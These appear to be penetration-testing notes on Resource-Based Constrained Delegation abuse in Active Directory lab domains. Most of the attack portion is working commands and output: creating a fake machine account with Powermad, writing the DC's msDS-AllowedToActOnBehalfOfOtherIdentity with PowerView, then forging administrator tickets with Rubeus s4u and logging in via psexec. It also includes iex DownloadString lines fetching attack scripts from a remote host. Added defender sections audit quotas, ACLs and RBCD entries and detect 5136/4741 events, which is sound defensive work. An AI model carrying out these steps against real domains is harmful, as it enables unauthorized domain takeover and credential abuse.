RBCD

Resource Based Constrained Delegation

Taking over a computer object and performing an S4U attack

Resource-Based Constrained Delegation can be exploited by adding a fake computer, $FAKE-COMP01, to the domain and configuring the DC to let it act on the DC's behalf. This lets us request Kerberos tickets as $FAKE-COMP01 while impersonating a domain admin. We then use Pass-the-Ticket to authenticate as that admin and take over the domain, i.e. we perform an S4U attack.

How does it work?

Resource-Based Constrained Delegation (RBCD) is a mechanism in Active Directory in which the resource (the target object) itself lists which principals may impersonate users to it. That list is stored in the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute as a security descriptor, and it is how computer objects are granted impersonation rights. Any user with write permissions (such as GenericAll or WriteDacl) on a computer account can configure this attribute on it.

What is needed
Code execution

Code execution as a domain user belonging to Authenticated Users

ms-DS-MachineAccountQuota

Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

The ms-DS-MachineAccountQuota attribute needs to be higher than 0. This attribute controls the number of computers that authenticated domain users can add to the domain (the default is 10).

Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC
Need GenericAll or WriteDACL

Our current user, or a group our user is a member of, needs write privileges (GenericAll or WriteDACL) over a domain-joined computer.
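The two preconditions above (a non-zero machine account quota and a non-admin principal with write rights over a computer object) are exactly what an administrator should audit for. The following PowerShell is an added defender-side example, not part of the original notes; it assumes the RSAT ActiveDirectory module is installed (so that the AD: drive exists) and that the caller can read the domain. The RBCD attribute's schema GUID is looked up from the schema rather than hard-coded.

```powershell
# Added audit example (not from the original notes).
# Assumes the RSAT ActiveDirectory module and its AD: PSDrive are available.
Import-Module ActiveDirectory

function Get-MachineAccountQuotaFinding {
    # ms-DS-MachineAccountQuota lives on the domain naming context head.
    $domain = Get-ADDomain
    $head   = Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota'
    $quota  = [int]$head.'ms-DS-MachineAccountQuota'
    [pscustomobject]@{
        Domain  = $domain.DNSRoot
        Quota   = $quota
        Finding = $(if ($quota -gt 0) { "any authenticated user may add $quota computer objects" } else { 'OK (quota is 0)' })
    }
}

function Get-ComputerWriteAccessFinding {
    param(
        # Principals expected to hold broad rights on computer objects; everything else is reported.
        [string[]]$ExpectedIdentity = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                                        '*\Domain Admins', '*\Enterprise Admins')
    )
    # Resolve the schema GUID of msDS-AllowedToActOnBehalfOfOtherIdentity at run time.
    $schemaNc = (Get-ADRootDSE).schemaNamingContext
    $attr     = Get-ADObject -SearchBase $schemaNc -Properties schemaIDGUID `
                    -LDAPFilter '(lDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity)'
    $rbcdGuid = [guid][byte[]]$attr.schemaIDGUID

    foreach ($computer in Get-ADComputer -Filter *) {
        $acl = Get-Acl -LiteralPath "AD:\$($computer.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $identity = $ace.IdentityReference.Value
            if ($ExpectedIdentity | Where-Object { $identity -like $_ }) { continue }
            $rights = $ace.ActiveDirectoryRights
            # Broad rights reach the attribute indirectly (or by rewriting the DACL/owner first).
            $broad = @('GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner') |
                Where-Object { $rights.HasFlag([DirectoryServices.ActiveDirectoryRights]$_) }
            # WriteProperty matters when unscoped (all properties) or scoped to the RBCD attribute.
            $scoped = $rights.HasFlag([DirectoryServices.ActiveDirectoryRights]::WriteProperty) -and
                      ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $rbcdGuid)
            if (-not ($broad -or $scoped)) { continue }
            [pscustomobject]@{
                Computer  = $computer.SamAccountName
                Identity  = $identity
                Rights    = $rights.ToString()
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-MachineAccountQuotaFinding | Format-List
Get-ComputerWriteAccessFinding | Format-Table -AutoSize
```

A quota finding is closed by setting ms-DS-MachineAccountQuota to 0 and delegating computer joins to a dedicated group; each write-access finding is a principal who, if compromised, could perform the attack described on this page against that computer, so each should either be removed or be an accepted, documented exception.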

Performing the S4U attack

S4U (Service for User) is a Kerberos protocol extension that lets a service request tickets on behalf of a user, so that it can access other resources as that user. An S4U attack abuses a delegation configuration that trusts an attacker-controlled account to obtain such tickets for a privileged user, and with them unauthorized access to sensitive resources.

Method 1

Create a new computer account, then use our write privilege on the DC to set the DC's msDS-AllowedToActOnBehalfOfOtherIdentity to that account, so we can impersonate any user to the DC. Powermad needs to be imported for this.

New-MachineAccount -MachineAccount Zen -Password $(ConvertTo-SecureString 'pass@123' -AsPlainText -Force)

We can then point the DC's msDS-AllowedToActOnBehalfOfOtherIdentity at our new account:

Set-ADComputer dc -PrincipalsAllowedToDelegateToAccount Zen$

And retrieve tickets with Rubeus

.\Rubeus.exe s4u /user:Zen$ /password:pass@123 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /nowrap

Find the administrator ticket in the output, save the base64 blob as ticket.b64, decode it with base64 -d into ticket.kirbi, then use ticketConverter.py to convert it into a format Impacket can use.

$ python ticketConverter.py ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] converting kirbi to ccache...
[+] done

Finally we can log in as administrator. Make sure the DC hostname (dc.support.htb here) resolves, e.g. by adding it to /etc/hosts.

KRB5CCNAME=ticket.ccache python psexec.py support.htb/administrator@dc.support.htb -k -no-pass

Method 2

First create the fake computer and add it to the domain with Powermad.

PS C:\Users\support\Documents> New-MachineAccount -MachineAccount ZenFakeComputer -Password $(ConvertTo-SecureString 'pass@132' -AsPlainText -Force)
[+] Machine account ZenFakeComputer added

# Check that the new machine was added
PS C:\Users\support\Documents> Get-ADComputer -identity ZenFakeComputer
DistinguishedName : CN=ZenFakeComputer,CN=Computers,DC=support,DC=htb
DNSHostName       : ZenFakeComputer.support.htb
Enabled           : True
Name              : ZenFakeComputer
ObjectClass       : computer
ObjectGUID        : 2aa665e0-20e0-420d-ac5c-b59c7b8b3de9
SamAccountName    : ZenFakeComputer$
SID               : S-1-5-21-1677581083-3380853377-188903654-5602
UserPrincipalName :

Configure the DC to trust the fake computer by building a security descriptor that contains its SID and writing it to the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

# Get the objectSID of the fake computer (ZenFakeComputer)
$fakesid = Get-DomainComputer ZenFakeComputer | select -expand objectsid

# Create a new security descriptor whose DACL grants full control to the fake computer's SID
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"

# Convert the security descriptor to a byte array
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# The target is the computer we are taking over, here the DC
$TargetComputer = 'DC'

# Set the msds-allowedtoactonbehalfofotheridentity attribute on the target computer
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Check if it worked

# Get the raw security descriptor of the domain controller
$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select-Object -ExpandProperty msds-allowedtoactonbehalfofotheridentity

# Create a new security descriptor object from the raw bytes
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0

# Access the discretionary access control list (DACL) of the security descriptor
$Descriptor.DiscretionaryAcl

BinaryLength       : 36
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-5602
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None

The DACL lists the principals that may act on behalf of the DC: a single AccessAllowed ACE whose SecurityIdentifier is the fake computer's SID, with an AccessMask of 983551 (0xF01FF, i.e. the full-control rights string from the SDDL above).
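The same decoding, turned around for the defender: rather than checking one computer, walk every computer object whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated, decode the descriptor exactly as above and resolve each allowed SID to an account name. This is an added example and not part of the original notes; it uses the DirectorySearcher type accelerator so it needs no extra module, and it assumes the caller is logged on to the domain being audited.

```powershell
# Added audit example (not from the original notes). Enumerates every computer with an
# RBCD descriptor and reports who is allowed to act on its behalf.
function Get-RbcdDelegationReport {
    param(
        # Assumption: default to the domain the current session is logged on to.
        [string]$SearchBase = ([adsi]'LDAP://RootDSE').defaultNamingContext
    )
    $searcher = [adsisearcher]'(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))'
    $searcher.SearchRoot = [adsi]"LDAP://$SearchBase"
    $searcher.PageSize   = 1000
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@(
        'samaccountname', 'whenchanged', 'msds-allowedtoactonbehalfofotheridentity'))

    foreach ($result in $searcher.FindAll()) {
        $props = $result.Properties
        # The attribute is stored as a binary security descriptor; decode it as the notes do.
        $bytes = [byte[]]$props['msds-allowedtoactonbehalfofotheridentity'][0]
        $sd    = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [Security.AccessControl.KnownAce]) { continue }
            $sid  = $ace.SecurityIdentifier
            $name = '<unresolved SID>'   # e.g. a principal that has since been deleted
            try { $name = $sid.Translate([Security.Principal.NTAccount]).Value } catch { }
            [pscustomobject]@{
                Target         = [string]$props['samaccountname'][0]
                TargetChanged  = $props['whenchanged'][0]
                AceType        = $ace.AceType
                AccessMask     = '0x{0:X}' -f $ace.AccessMask
                AllowedSid     = $sid.Value
                AllowedAccount = $name
            }
        }
    }
}

Get-RbcdDelegationReport | Sort-Object TargetChanged -Descending | Format-Table -AutoSize
```

Every row is a delegation trust that should be explainable: a domain controller, or any server, normally has no entry at all, a row whose AllowedAccount is a recently created computer (compare with the page's ZenFakeComputer$) or an unresolvable SID is a strong indicator of the technique above, and the TargetChanged timestamp narrows the window in which the attribute was written. Removing the trust is a matter of clearing the attribute on the target, for example with Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null.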

First get the rc4_hmac value of the fake computer's password with Rubeus:

PS C:\Users\support\Documents> .\Rubeus.exe hash /password:zenpass@123 /user:ZenFakeComp /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : zenpass@123
[*] Input username             : ZenFakeComp
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBZenFakeComp
[*]       rc4_hmac             : DFA8C3D737ACDD5F9AF9F4B60205E8D9
[*]       aes128_cts_hmac_sha1 : DBC10236F5F70D66F4BBF93819D3635B
[*]       aes256_cts_hmac_sha1 : 6AFC3C4155B027E5B43BE2B3B1636114C877C3B077808F25B3689A1925931D40
[*]       des_cbc_md5          : 8F20A2C8B90780C7

Next retrieve the tickets with Rubeus

PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:ZenFakeComp$ /rc4:DFA8C3D737ACDD5F9AF9F4B60205E8D9 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

From Windows

enter-pssession -computer kingslanding.sevenkingdoms.local -Credential stannis.baratheon

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/Powermad.ps1'))

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))

New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)

[+] Machine account PWNED added

Set-DomainRBCD kingslanding -DelegateFrom PWNED -Domain sevenkingdoms.local -Server kingslanding.sevenkingdoms.local -Verbose

Set-DomainRBCD kingslanding.sevenkingdoms.local -DelegateFrom PWNED -Domain sevenkingdoms.local -Server kingslanding.sevenkingdoms.local -Verbose

[kingslanding.sevenkingdoms.local]: PS C:\Users\stannis.baratheon\Documents> Set-DomainRBCD kingslanding.sevenkingdoms.local -DelegateFrom PWNED -Domain sevenkingdoms.local -Server kingslanding.sevenkingdoms.local -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://kingslanding.sevenkingdoms.local/DC=sevenkingdoms,DC=local
VERBOSE: [Set-DomainRBCD] Appending DelegateFilter: (|(|(samAccountName=PWNED)(name=PWNED)(displayname=PWNED)))
VERBOSE: [Set-DomainRBCD] Set-DomainRBCD filter string: (|(|(|(samAccountName=PWNED)(name=PWNED)(displayname=PWNED))))
VERBOSE: [Set-DomainRBCD] Appending to SDDL string: (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3008081783-3975149589-1763115855-1126)
VERBOSE: [Set-DomainRBCD] Using SDDL string: O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3008081783-3975149589-1763115855-1126)
VERBOSE: [Get-DomainSearcher] search base: LDAP://kingslanding.sevenkingdoms.local/DC=sevenkingdoms,DC=local
VERBOSE: [Set-DomainRBCD] Set-DomainRBCD filter string: (|(|(|(samAccountName=PWNED)(name=PWNED)(displayname=PWNED))))
VERBOSE: [Set-DomainRBCD] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0 36 0 0 0 1 2 0 0 0 0
0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 119 175 75 179 21 248 239 236 79 3 23 105 102 4 0 0'
for object 'KINGSLANDING$'
[kingslanding.sevenkingdoms.local]: PS C:\Users\stannis.baratheon\Documents>
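The verbose output above is the write that a defender wants to see in the audit trail. When "Audit Directory Service Changes" is enabled and the computer objects carry a SACL for property writes, each write to msDS-AllowedToActOnBehalfOfOtherIdentity produces Security event 5136 on the DC that served the request, and the Powermad step before it produces event 4741 (computer account created). The following PowerShell is an added detection example, not part of the original notes; it assumes those audit settings are in place and that the caller can read the DC's Security log.

```powershell
# Added detection example (not from the original notes).
# Assumes "Audit Directory Service Changes" is enabled and computer objects have a
# property-write SACL, otherwise no 5136 events exist to find.

function Get-RbcdChangeEvent {
    param(
        [string]$DomainController = $env:COMPUTERNAME,   # assumption: run on or against a DC
        [int]$Days = 7
    )
    $windowMs = $Days * 86400000
    # 5136 carries the modified attribute's LDAP display name in its EventData.
    $xpath = "*[System[EventID=5136 and TimeCreated[timediff(@SystemTime) <= $windowMs]] " +
             "and EventData[Data[@Name='AttributeLDAPDisplayName']='msDS-AllowedToActOnBehalfOfOtherIdentity']]"
    Get-WinEvent -ComputerName $DomainController -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time          = $_.TimeCreated
                Subject       = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
                ObjectDN      = $data['ObjectDN']
                OperationType = $data['OperationType']   # value added vs. value deleted
                AttributeHex  = $data['AttributeValue']  # the raw descriptor, as in the VERBOSE line above
            }
        }
}

function Get-ComputerCreationEvent {
    param(
        [string]$DomainController = $env:COMPUTERNAME,
        [int]$Days = 7
    )
    $windowMs = $Days * 86400000
    # 4741: a computer account was created. Subject is who created it, Target is the new account.
    $xpath = "*[System[EventID=4741 and TimeCreated[timediff(@SystemTime) <= $windowMs]]]"
    Get-WinEvent -ComputerName $DomainController -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time       = $_.TimeCreated
                CreatedBy  = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
                NewAccount = $data['TargetUserName']
            }
        }
}

Get-ComputerCreationEvent | Format-Table -AutoSize
Get-RbcdChangeEvent       | Format-Table -AutoSize
```

The pairing is the signal: a 4741 whose CreatedBy is an ordinary user (the machine account quota at work), followed within minutes by a 5136 from the same subject against a server or DC, is the sequence this page walks through. Without the SACL, 5136 is silent, so the earlier audit of the attribute itself remains the fallback.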

Get-DomainComputer PWNED

./Rubeus.exe asktgt /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /user:PUCKPC /password:12345 /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show

Note the following line in the output, since its hash is what the next command uses:

[*] Using rc4_hmac hash: 7A21990FCD3D759941E45C490F143D5F

.\Rubeus.exe s4u /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /user:PWNED /rc4:7A21990FCD3D759941E45C490F143D5F /impersonateuser:administrator /msdsspn:CIFS/kingslanding.sevenkingdoms.local /ptt /nowrap

dir \\kingslanding.sevenkingdoms.local\c$

Resource-Based Constrained Delegation attack

Abusing this primitive is possible through the Rubeus project.

First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we’re taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus' s4u module to get a service ticket for the service name (sname) we want to "pretend" to be "admin" for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt
